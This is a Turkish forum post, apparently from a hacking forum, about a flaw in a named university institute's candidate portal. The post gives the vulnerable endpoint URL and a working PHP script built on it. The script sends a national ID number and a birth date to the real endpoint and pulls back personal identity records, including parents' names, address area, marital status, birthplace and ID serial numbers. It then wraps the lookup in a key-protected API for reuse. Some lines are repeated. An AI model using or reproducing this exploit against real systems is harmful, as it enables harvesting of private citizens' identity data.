Eskiden hacettepe üniversitesi ensitütü bölümünde öğrenci hesabı açıldığında noredirect açığı sayesinde personellerin eriştiği bir bölgeye erişebiliyorduk. Peki bu nasıl oluyordu gelin inceleyelim.
URL: https://enstitu.hacettepe.edu.tr/aday/crud!bilgiGetir.action?yerli_kimlik_tc_kimlik_no= tc k1ml1k no giriliyor &aday_ad=asd&aday_soyad=asd&yerli_kimlik_dogum_tarih=doğum tarihi giriliyor
PHP ile gösterecek olursak kod şu şekilde olur:
URL: https://enstitu.hacettepe.edu.tr/aday/crud!bilgiGetir.action?yerli_kimlik_tc_kimlik_no= tc k1ml1k no giriliyor &aday_ad=asd&aday_soyad=asd&yerli_kimlik_dogum_tarih=doğum tarihi giriliyor
PHP ile gösterecek olursak kod şu şekilde olur:
PHP:
<?php
// Yaman Karaman - spyhackerz - imhatimi
header("Content-Type: application/json; utf-8;");
$auth = "yamanileduaet";
if($_GET['auth'] != $auth) {
echo json_encode(array('success' => false, 'auth' => 'Yaman Karaman', 'message' => 'auth key yanlis'));
die(); }
$tc = $_POST['tc'];
$dogum = $_POST['dogum'];
$url = "https://enstitu.hacettepe.edu.tr/aday/crud!bilgiGetir.action?yerli_kimlik_tc_kimlik_no=$tc&aday_ad=asd&aday_soyad=asd&yerli_kimlik_dogum_tarih=$dogum";
$agent = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"ayricalik=ad,soyad,baba_adi,ana_adi,mahalle,medeni_hal,cinsiyet,dogum_tarih,cilt_no,aile_sira_no,sira_no,dogum_yer,il_pk,il_ad,ilce_pk,ilce_ad,seri_no,seri,no,seri,no");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
$curl_scraped_page = curl_exec($ch);
curl_close($ch);
$json31imhatimi = json_decode($curl_scraped_page, true);
echo json_encode(array("success" => "true","auth" => "Yaman Karaman", "data" => $json31imhatimi["adayList"]));
?>
